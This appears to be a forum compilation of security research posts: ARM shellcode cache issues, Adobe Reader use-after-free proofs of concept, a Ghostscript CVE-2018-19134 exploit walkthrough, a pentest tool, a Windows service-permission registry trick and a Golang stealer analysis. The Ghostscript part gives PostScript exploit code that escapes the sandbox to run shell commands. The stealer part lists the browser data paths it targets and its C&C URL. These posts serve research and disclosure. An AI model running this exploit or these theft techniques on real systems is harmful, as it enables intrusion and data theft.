ARMv6 they were privileged and so won't work on older chips. ARMv6 cache syncing instructions Shellcode to call sleep() If you are too restricted by a filter to execute these instructions, as we were, neither of these solutions will work. While there are rumors about using SWI 0x9F0002 and overwriting the call number because the system interprets it as data, this method did not work for us and so we can’t recommend it (but feel free to let us know if you tried it and it worked for you). One thing we could do is call mprotect() from libc on the modified shellcode, but an even easier thing is to call sleep() just like we did on MIPS. We ran a series of experiments and determined that calling sleep() caused the caches to sync on ARMv6. Our shellcode was limited by a filter, so, although we were executing shellcode at this point, we took advantage of functions in libc. We found the address of sleep, but its lower byte was below the threshold of the filter. We added 0x20 to the address (the lowest byte allowed) to pass it through the filter and subtracted it with our shellcode, as shown to the right. Although context switches don't directly cause cache invalidation, we suspect that the next process to execute often uses enough of the instruction cache that it requires blocks belonging to the sleeping process. The technique worked well on this processor and platform, but if it doesn’t work for you, we recommend using mprotect() for higher certainty. Conclusion The way systems work in theory is not necessarily what happens in the real world. While chips have been designed to prevent additional overhead during context switches, no system runs in precisely the way it was intended. We had fun digging into these issues. Diagnosing computer problems reminds us how difficult it can be to diagnose health conditions. Symptoms show up in a different location than their cause, like pain referred from one part of the leg to another, and simply observing the problem can change its behavior. Embedded devices were designed to be black boxes, telling us nothing and quietly going about the one task they were designed to do. With more insight into their behavior, we can begin to solve the security problems that confound us. Just getting started in security? Check out the recent video series on the fundamentals of device security. Old hand? Try our team's research on lateral attacks, the vulnerability our ARM work was based on, and the MIPS-based router vulnerability. Sursa: https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm
-
- 1
-
-
Using the Weblinks API to Reach JavaScript UAFs in Adobe Reader February 06, 2019 | Abdul-Aziz Hariri JavaScript vulnerabilities in Adobe Acrobat/Reader are getting fewer and fewer. I credit this to the “boom” that happened back in 2015 and 2016. Back then, a lot of Adobe Acrobat research emerged ranging from JavaScript API bypasses to the classic memory corruption style vulnerabilities (i.e. Use-After-Free, Type Confusions, Heap/Stack Overflows, etc.). In fact, in 2015, ZDI disclosed 97 vulnerabilities affecting Adobe Acrobat/Reader with almost 90% of the 97 vulnerabilities affecting the JavaScript API. 2016 had a slight increase totaling 110 vulnerabilities with almost the same percentage of JavaScript vulnerabilities. Most of the vulnerabilities targeted non-privileged JavaScript APIs. For those who are not familiar with Adobe Acrobat/Reader’s JavaScript API, the first thing you should know is that the JavaScript engine is a fork of Mozilla’s SpiderMonkey. Second, Adobe has a similar privileges architecture as SpiderMonkey. There are two privilege contexts: Privileged and Non-Privileged. This in turn splits the JavaScript APIs also into two: Privileged APIs and Non-Privileged. That said, it’s worth noting that probably 90-95% of the corruption vulnerabilities affecting the JavaScript APIs over the past couple of years mainly targeted non-privileged APIs. That still leaves us with a huge sum of non-audited, non-fuzzed, non-touched privileged APIs. That’s perfectly understandable since auditing privileged APIs is more involved. It also requires a JavaScript Privileges API bypass vulnerability to trigger and weaponize them. In other words, it’s more expensive. Thus, most of the big numbers heard around public research on how someone found tens or hundreds of vulnerabilities in Acrobat/Reader are mostly (if not ALL) image parsing vulnerabilities. It’s smart, if you ask me, but if you think that makes you hardcore, then we’re waiting for you at Pwn2Own, with your favorite image parsing bug weaponized and all of your Adobe CVEs on the back of your T-shirt of course. Trolling aside, we do still get some JavaScript vulnerabilities every now and then. Slapping this.closeDoc into API’s for UAF’s does not work anymore as far as I can tell. Well, at least for non-privileged APIs. New JavaScript UAF’s have been a little bit more elegant though they still have the same logic. For example, ZDI-18-1393, ZDI-18-1391, and ZDI-18-1394. While all of the 3 vulnerabilities are Use-After-Free vulnerabilities, the logic is interesting. First, all of those are vulnerabilities that affected WebLinks. Links in Adobe Acrobat in general are handled inside the WebLinks.api plugin. There’s a set of JavaScript APIs exposed to handle links. For example, this.addLink API (where this is the Doc object) accepts two arguments and is used to add a new link to the specified page with the specified coordinates. Here’s a code example: Another API that is quite useful as it forces the Link object to be freed *wink* is the this.removeLinks API. As the name implies, it removes all the links on the specified page within the specified coordinates. Here’s its code example: So how do these APIs relate to the bugs I mentioned? Simple: Create a Link with addLink, force the Link to be freed with removeLinks, and finally re-use it somehow. Well, it’s not that simple but the logic is right for all of these bugs. Here’s a breakdown of the PoCs… ZDI-18-1393: The PoC defines an array. It then defines a getter for the first element. The getter’s callback function calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderColor attribute set to the array defined earlier. ZDI-18-1391: The PoC defines an object named “mode”. It then defines a custom toString function which calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the highlightMode attribute set to the object defined earlier. ZDI-18-1394: The PoC defines a variable named “width”. It then defines a custom valueOf function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderWidth attribute set to the variable defined earlier. Conclusion Although a lot of the non-privileged API’s have been heavily audited, there still are different methods that can still yield good results. Don’t forget that there’s still a huge attack surface waiting to be audited underneath the privileged APIs. Regardless, some more ingredients are required to reach those APIs (API restrictions bypasses). Even that can be challenging to defeat with the recent restrictions mitigations that Adobe rolled into Acrobat/Reader. That’s it for today folks. Until next time, you can find me on Twitter at @AbdHariri, and follow the team for the latest in exploit techniques and security patches. Sursa:https://www.zerodayinitiative.com/blog/2019/2/6/using-the-weblinks-api-to-reach-javascript-uafs-in-adobe-reader
-
Exploiting CVE-2018-19134: remote code execution through type confusion in Ghostscript February 05, 2019 Posted by Man Yue Mo In this post I'll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you'd like to know more about how I used our QL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post. The vulnerability Let's first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s). struct ref_s { struct tas_s tas; union v { ps_int intval; ... uint64_t dummy; } value; }; This is a 16 byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for array, string, dictionary, etc.: struct tas_s { ushort type_attrs; ushort _pad; uint32_t rsize; }; The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t. static int zsetcolor(i_ctx_t * i_ctx_p) { ... if ((n_comps = cs_num_components(pcs)) < 0) { n_comps = -n_comps; if (r_has_type(op, t_dictionary)) { ref *pImpl, pPatInst; if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0) return code; if (code > 0) { code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy if (code < 0) return code; cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?! n_numeric_comps = ( pattern_instance_uses_base_space(cc.pattern) ? n_comps - 1 : 0); Here, r_ptr is a macro in iref.h: #define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct)) The value of pstruct originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41. << /Implementation [16#41] >> setpattern Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer: pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst) { return pinst->type->procs.uses_base_space( pinst->type->procs.get_pattern(pinst) ); } So it looks like I may be able to control a number of function pointers: get_pattern, uses_base_space, and pinst. Creating a fake object Let's see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control: In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs and pad in tas completely); green indicates the data that I have complete control of. The crucial point here is that, both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays: GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern This sets pinst to the array [16#41 [16#51 16#52]] and results in: This shows I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution? 8 bytes off an easy exploit I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator. As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by getting the operators off the systemdict by their name: GS>systemdict /put get == GS>--put-- So let's try to put some built-in functions in our fake array: /arr 100 array def systemdict /put get arr exch 1 exch put systemdict /get get arr exch 0 exch put <</Implementation [[16#41 arr]] >> setpattern I'll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may exist a better way of achieving that, but keep in mind that I've never written a line of PostScript before I found these vulnerabilities, so please bear with me. Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern: So I can now call functions that I could already call from PostScript anyway, so what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (alias of gs_context_state_s — they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions: struct gs_context_state_s { ... bool LockFilePermissions; /* accessed from userparams */ ... /* Put the stacks at the end to minimize other offsets. */ dict_stack_t dict_stack; exec_stack_t exec_stack; op_stack_t op_stack; struct i_plugin_holder_s *plugin_list; }; When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we'll be able to call functions as if Ghostscript is running without -dSAFER mode switched on. So let's try to create a PostScript array to fake the context i_ctx_t object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the argument. In order to call PostScript functions with a fake context, I'll need to control p. The offset from p to the i_ctx_p here is actually the same as the offset of op_stack, which is 0x270. As each ref is of size 0x10, this corresponds to the 39th element in the fake reference array: As seen from the diagram, this alignment is not ideal. The op_stack.stack.p corresponds to the tas part of my array, which I don't control completely. If only op_stack corresponded to a value field of a ref, then I would have succeeded. What's more, tas stores meta data of a ref, so even if I have full control of it, I won't be able to set it to the address of an arbitrary object without first knowing its address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper. Getting arbitrary read and write primitives The idea now is to find a PostScript function that: Does not dereference the osp (op_stack.stack.p) pointer; Still does something "useful" to osp; Is available in SAFER mode. Stack operators come to mind. The pop operator is particularly interesting: zpop(i_ctx_t *i_ctx_p) { os_ptr op = osp; check_op(1); pop(1); return 0; } It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If it is greater than osbot, then decreases the value of osp. It is a simple function that does not dereference osp, and it changes its value. To see what I can gain from this, let's take a closer look at the structure of ref and op_stack side by side: Recall that in our fake object, op_stack is faked by the 39th element of a ref array, which is a ref. As you can see in the image above, the field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _padd and rsize combined to form the the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice! One catch though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, will combine with others to give something that is greater than the pointer address of most ref objects. This prevents me from just modifying the accessibility of built-in read only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do: I can "convert" an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte of the same length). This allows me to read/write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of length specified by rsize, so any byte can be read/write from the byte buffer. Note that this does not give me any out-of-bound (OOB) read/write as the resulted string will have the same length as the original array, but since each ref is of 16 bytes, the resulting byte buffer will only cover about 1/16 of the original allocated buffer for the ref array. This is what I'm going to do with the exploit. I can of course do it the other way round and "convert" a string into an array of the same length. As explained above, the resulting ref array will be about 16 times larger than the original string array, which allows me to do OOB read and write. I have not pursued this route. There is one more technical difficulty that I need to overcome. The fake object, pinst actually calls two functions, with the output of one feeding into another: return pinst->type->procs.uses_base_space( pinst->type->procs.get_pattern(pinst) ); As seen from above, use_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst) as an input. As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn't even use the context pointer i_ctx_p at all. If only there exists a query language I could use to find particular patterns in a code base! Here's the QL query I used to find the operator I was looking for: from Function f where f.getName().matches("z%") and f.getFile().getAbsolutePath().matches("%/psi/%") and // Look for functions with a single parameter of the right type: f.getNumberOfParameters() = 1 and f.getParameter(0).getType().hasName("i_ctx_t *") and // Make sure the function is actually defined: exists(Stmt stmt | stmt.getEnclosingFunction() = f) and // And doesn't access `i_ctx_p` not exists(FieldAccess fa, Function f2 | fa.getQualifier().getType().hasName("i_ctx_t *") and fa.getEnclosingFunction() = f2 and f.calls*(f2) ) // And doesn't dereference `i_ctx_p` and not exists(PointerDereferenceExpr expr, Variable v, Function f2 | expr.getAnOperand() = v.getAnAccess() and v.getType().hasName("i_ctx_t *") and expr.getEnclosingFunction() = f2 and f.calls*(f2) ) select f My QL query uses some heuristics to identify PostScript operators. Their names normally start with z and are defined inside the psi directory. Also they they take an argument of type i_ctx_t *. I then look for functions that do not dereference the argument nor access its fields, either in itself or in functions that it calls. This query does not look for dereferences of the parameter i_ctx_p particularly, but just any variable of type i_ctx_t *, which is a good enough approximation. You can run your own QL queries on over 130,000 GitHub,Bitbucket, and GitLab projects at LGTM.com. You can use either the online query console, or you can install the QL for Eclipse plugin and run queries locally on a code snapshot (downloadable from the repo's project page on LGTM). Ghostscript is not developed on GitHub, Bitbucket, or GitLab, so it has not been analyzed by LGTM.com. But you can download a Ghostscript code snapshot here. This query gives me 6 results: The function ucache seems to be just what we need. Let's try to put this together and see if it works. First set up the fake object pinst: %Create the fake array pinst /pinst 100 array def %array that stores the pop-ucache gadget /pop_ucache 100 array def %put pop into pop_ucache to cause more type confusions by decrementing osp systemdict /pop get pop_ucache exch 1 exch put %put ucache in (no op) to avoid crash systemdict /ucache get pop_ucache exch 0 exch put %replace the functions with pop and ucache pinst 1 pop_ucache put Now we need to create a large array object and store it in the 39th element of pinst. It's metadata tas will then be interpreted as the stack pointer address osp. I'll use the PostScript operator put as its first element, then use pop to change its type to string and read off the address of the zput function. %make a large enough array and change its type with pop /arr 32767 array def %get the address of the put operator systemdict /put get arr exch 0 exch put %store arr as 39th element of pinst and modify its type pinst 39 arr put %Create the argument to setpattern /impl 100 dict def impl /Implementation [pinst] put %Change type of arr to string 0 1 1291 {impl setpattern} for % Print the address of zput as string pinst 39 get 8 8 getinterval It is a bit unfortunate that the type_attrs value for array is 0x4 while the value for string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to do impl setpattern 1291 times. As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run it outside of gdb or at least enable address randomization to get it work, as gdb seem to always allocate arr at 0x7ffff0a35078, but with memory randomization, I've not failed a single time with the above. I can also use this to write bytes to any position in arr. Sandbox bypass Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions parameter, and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I'm just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely. Summarizing, here is what I need to do now: Create a fake operand stack with arguments that I want to supply to forceput; Overwrite the location in pinst that stores the address of the operand stack pointer to the address of what I created above; Get the address of forceput and replace pinst->type.procs.getpattern with its address. To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments: /operand 3 array def operand 0 userparams put operand 1 /LockFilePermissions put operand 2 false put I can then store it in arr to retrieve the address to this array. Instead of using arr, I'm just going to reuse pinst and put it in the 31st element instead: pinst 31 operand 2 1 getinterval put Note that instead of putting operand into the 31st element of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions looks for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it will get my other arguments. Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This then sets up pinst for calling forceput. Although forceput is not accessible from SAFER mode, I can simply take the address of zput, and add its offset to zforceput to obtain the address of zforceput (as this offset is not randomized). In the debug binary compiled with commit 81f3d1e, this offset is 0x437 and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call a restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here's a screenshot of the launching of a calculator from sandboxed Ghostscript: By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don't stop a specially-crafted PDF file from wiping a user's entire home directory when opened. Or, if you're in a more forgiving mood, you could delete all files from a user's desktop and subsequently flood it with Super Mario bricks: https://youtube.com/watch?v=5vVxN-vfCsI For more videos about our security research and exploits, please visit the Semmle YouTube channel. If you'd like to run your own QL queries on open source software: you can! We've made our QL technology freely available for running queries on open source projects that have been analyzed by LGTM.com. At the time of writing, LGTM.com has analyzed around 130,000 GitHub, Bitbucket, and GitLab repositories. For each of these projects, you can download a code snapshot from LGTM.com for running queries. In addition, you'll need the QL for Eclipse plugin. Unfortunately Ghostscript is not developed on GitHub.com and has therefore not been analyzed by LGTM.com. We've therefore made the Ghostscript code snapshot available here. Sursa: https://lgtm.com/blog/ghostscript_CVE-2018-19134_exploit?
-
Introducing Armory: External Pentesting Like a Boss Posted by Dan Lawson on February 04, 2019 Link TLDR; We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database and use the new data to supply targets for other tools. Why? Over the past few years I’ve spent a lot of time conducting some relatively large-scale external penetration tests. This ends up being a massive exercise in managing various text files, with a moderately unhealthy dose of grep, cut, sed, and sort. It gets even more interesting as you discover new domains, new IP ranges or other new assets and must start the entire process over again. Long story short, I realized that if I could automate handling the data, my time would be freed up for actual testing and exploitation. So, Armory was born. What? Armory is written in Python. It works with both Python2 and Python3. It is composed of the main application, as well as modules and reports. Modules are wrapper scripts that run public (or private) tools using either data from the command line or from data in the database. The results of this are then either processed and imported into the database or just left in their text files for manual perusal. The database handles the following types of data: BaseDomains: Base domain names, mainly used in domain enumeration tools Domains: All discovered domains (and subdomains) IPs: IP addresses discovered CIDRs: CIDRs, along with owners that these IP addresses reside in, pulled from whois data ScopeCIDRs: CIDRs that are explicitly added are in scope. This is separated out from CIDRs since many times whois servers will return much larger CIDRs then may belong to a target/customer. Ports: Port numbers and services, usually populated by Nmap, Nessus, or Shodan Users: Users discovered via various means (leaked cred databases, LinkedIn, etc.) Creds: Sets of credentials discovered Additionally, with Basedomains, Domains and IPs you have two types of scoping: Active scope: Host is in scope and can have bad-touch tools run on it (i.e. nmap, gobuster, etc.). Passive scope: Host isn’t directly in scope but can have enumeration tools run against it (i.e. aquatone, sublist3r, etc.). If something is Active Scoped, it should also be Passive Scoped. The main purpose of Passive scoping is to handle situations where you may want data ingested into the database and the data may be useful to your customers, but you do not want to actively attack those targets. Take the following scenario: You are doing discovery and an external penetration test for a client trying to find out all of their assets. You find a few dozen random domains registered to that client but you are explicitly scoped to the subnets that they own. During the subdomain enumeration, you discover multiple development web servers hosted on Digital Ocean. Since you do not have permission to test against Digital Ocean, you don't want to actively attack it. However, this would still be valuable information for the client to receive. Therefore you can leave those hosts scoped Passive and you will not run any active tools on it. You can still generate reports later on including the passive hosts, thereby still capturing the data without breaking scope. Detalii complete: https://depthsecurity.com/blog/introducing-armory-external-pentesting-like-a-boss
-
- 1
-
-
Posted on February 7, 2019 Demystifying Windows Service “permissions” configuration Some days ago, I was reflecting on the SeRestorePrivilege and wondering if a user with this privilege could alter a Service Access, for example: grant to everyone the right to stop/start the service, during a “restore” task. (don’t expect some cool bypass or exploit here) As you probably know, each object in Windows has DACL’s & SACL’s which can be configured. The most “intuitive” are obviously files and folder permissions but there are a plenty of other securable objects https://docs.microsoft.com/en-us/windows/desktop/secauthz/securable-objects Given that our goal is Service permissions, first we will try to understand how they work and how we can manipulate them. Service security can be split into 2 parts: Access Rights for the Service Control Manager Access Rights for a Service We will focus on Access Rights for the service, which means who can start/stop/pause service and so on. For detailed explanation take a look at this article from Microsoft: https://docs.microsoft.com/it-it/windows/desktop/Services/service-security-and-access-rights How can we change the service security settings? Configuring Service Security and Access Rights is not so an immediate task like, for example, changing DACL’s of file or folder objects. Keep also in mind that it is limited only to privileged users like Administrators and SYSTEM account. There are some built-in and third party tools which permits changing the DACL’s of a service, for example: Windows “sc.exe”. This program has a lot of options and with “sdset” it is possible to modifiy the security setting of a service, but you have to specify it in the cryptic SDDL (Security Description Definition Language). The opposite command “sdshow” will list the SDDL: Note that interactive user (IU) cannot start or stop the BITS service because the necessary rights (RP,WP) are missing. I’m not going to explain in deep this stuff, if interested look here: https://support.microsoft.com/en-us/help/914392/best-practices-and-guidance-for-writers-of-service-discretionary-acces subinacl.exe from Windows Resource Kit. This one is much more easier to use. In this example we will grant to everyone the right to start the BITS (Backgound intelligent transfer service) Service Security Editor , a free GUI Utility to set permissions for any Windows Service: And of course, via Group Policy, powershell, etc.. All these tools and utilities relies on this Windows API call, accessible only to high privileged users: BOOL SetServiceObjectSecurity( SC_HANDLE hService, SECURITY_INFORMATION dwSecurityInformation, PSECURITY_DESCRIPTOR lpSecurityDescriptor ); Where are the service security settings stored? Good question! First of all, we have to keep in mind that services have a “default” configuration: Administrators have full control, standard users can only interrogate the service, etc.. Services with non default configuration have their settings stored in the registry under this subkey: HKLM\System\CurrentControlSet\Services\<servicename>\security This subkey hosts a REG_BINARY key which is the binary value of the security settings: These “non default” registry settings are read when the Service Control Manager starts (upon boot) and stored in memory. If we change the service security settings with one of the tools we mentioned before, changes are immediately applied and stored in memory. During the shutdown process, the new registry values are written. And the Restore Privilege? You got it! With the SeRestorePrivilege, even if we cannot use the SetServiceObjectSecurity API call, we can restore registry keys, including the security subkey… Let’s make an example: we want to grant to everyone full control over BITS service On our Windows test machine, we just modify the settings with one of the tools: After that, we restart our box and copy the new binary value of the security key: Now that we have the right values, we just need to “restore” the security key with these. For this purpose we are going to use a small “C” program, here the relevant part: byte data[] = { 0x01, 0x00, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x00, 0xb4, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00, 0x02, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0xc0, 0x18, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x02, 0x00, 0x70, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x02, 0x14, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x06, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00 }; LSTATUS stat = RegCreateKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\BITS\\Security", 0, NULL, REG_OPTION_BACKUP_RESTORE, KEY_SET_VALUE, NULL, &hk, NULL); stat = RegSetValueExA(hk, "security", 0, REG_BINARY, (const BYTE*)data,sizeof(data)); if (stat != ERROR_SUCCESS) { printf("[-] Failed writing!", stat); exit(EXIT_FAILURE); } printf("Setting registry OK\n"); We need of course to enable the SE_RESTORE_NAME privilege before in our process token. In an elevated shell, we execute the binary on the victim machine: and after the reboot we are able to start BITS even with a low privileged user: And the Take Onwer Privilege? The concept is the same, we need to take the ownership of the registry key before, grant the necessary access rights (SetNamedSecuityInfo() API calls) on the key and then do the same trick we have seen before. But wait, one moment! What if we take the onwersip of the service? dwRes = SetNamedSecurityInfoW( pszService, SE_SERVICE, OWNER_SECURITY_INFORMATION, takeownerboss_sid, NULL, NULL, NULL); Yes, this works, but when we set the permissions on the object (again with SetNamedSecurityInfo) we get an error. If we do this with admin rights, it works… Probably the function will call the underlying SetServiceObjectSecurity which modifies the permissions of the service stored “in memory” and this is precluded to non admins. Final thoughts So we were able to change the Service Access Rights with our “restoreboss” user. Nothing really useful i think, but sometimes it’s just fun to try to understand some parts of the Windows internal mechanism, do you agree? Sursa: https://decoder.cloud/2019/02/07/demystifying-windows-service-permissions-configuration/
- 1 reply
-
- 2
-
-
Analyzing a new stealer written in Golang Posted: January 30, 2019 by hasherezade Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++. Recently, a new variant of Zebocry malware was observed that was written in Go (detailed analysis available here). We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go. Analyzed sample This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go: 992ed9c632eb43399a32e13b9f19b769c73d07002d16821dde07daa231109432 513224149cd6f619ddeec7e0c00f81b55210140707d78d0e8482b38b9297fc8f 941330c6be0af1eb94741804ffa3522a68265f9ff6c8fd6bcf1efb063cb61196 – HyperCheats.rar (original package) 3fcd17aa60f1a70ba53fa89860da3371a1f8de862855b4d1e5d0eb8411e19adf – HyperCheats.exe (UPX packed) 0bf24e0bc69f310c0119fc199c8938773cdede9d1ca6ba7ac7fea5c863e0f099 – unpacked Behavioral analysis Under the hood, Golang calls WindowsAPI, and we can trace the calls using typical tools, for example, PIN tracers. We see that the malware searches files under following paths: "C:\Users\tester\AppData\Local\Uran\User Data\" "C:\Users\tester\AppData\Local\Amigo\User\User Data\" "C:\Users\tester\AppData\Local\Torch\User Data\" "C:\Users\tester\AppData\Local\Chromium\User Data\" "C:\Users\tester\AppData\Local\Nichrome\User Data\" "C:\Users\tester\AppData\Local\Google\Chrome\User Data\" "C:\Users\tester\AppData\Local\360Browser\Browser\User Data\" "C:\Users\tester\AppData\Local\Maxthon3\User Data\" "C:\Users\tester\AppData\Local\Comodo\User Data\" "C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\" "C:\Users\tester\AppData\Local\Vivaldi\User Data\" "C:\Users\tester\AppData\Roaming\Opera Software\" "C:\Users\tester\AppData\Local\Kometa\User Data\" "C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\" "C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\" "C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\" "C:\Users\tester\AppData\Local\Orbitum\User Data\" "C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\" "C:\Users\tester\AppData\Local\K-Melon\User Data\" Those paths point to data stored from browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia. The next searched path is for the desktop: "C:\Users\tester\Desktop\*" All files found there are copied to a folder created in %APPDATA%: The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. Example from our test machine: After the search is completed, the files are zipped: We can see this packet being sent to the C&C (cu23880.tmweb.ru/landing.php): Inside Golang compiled binaries are usually big, so it’s no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX. As a result, we get plain Go binary. The export table reveals the compilation path and some other interesting functions: Looking at those exports, we can get an idea of the static libraries used inside. Many of those functions (trampoline-related) can be found in the module sqlite-3: https://github.com/mattn/go-sqlite3/blob/master/callback.go. Function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go). Tools For the analysis, I used IDA Pro along with the scripts IDAGolangHelper written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> script file). We then see the following menu, giving access to particular features: First, we need to determine the Golang version (the script offers some helpful heuristics). In this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts. Before (only the exported functions are named): After (most of the functions have their names automatically resolved and added): Many of those functions comes from statically-linked libraries. So, we need to focus primarily on functions annotated as main_* – that are specific to the particular executable. Code overview In the function “main_init”, we can see the modules that will be used 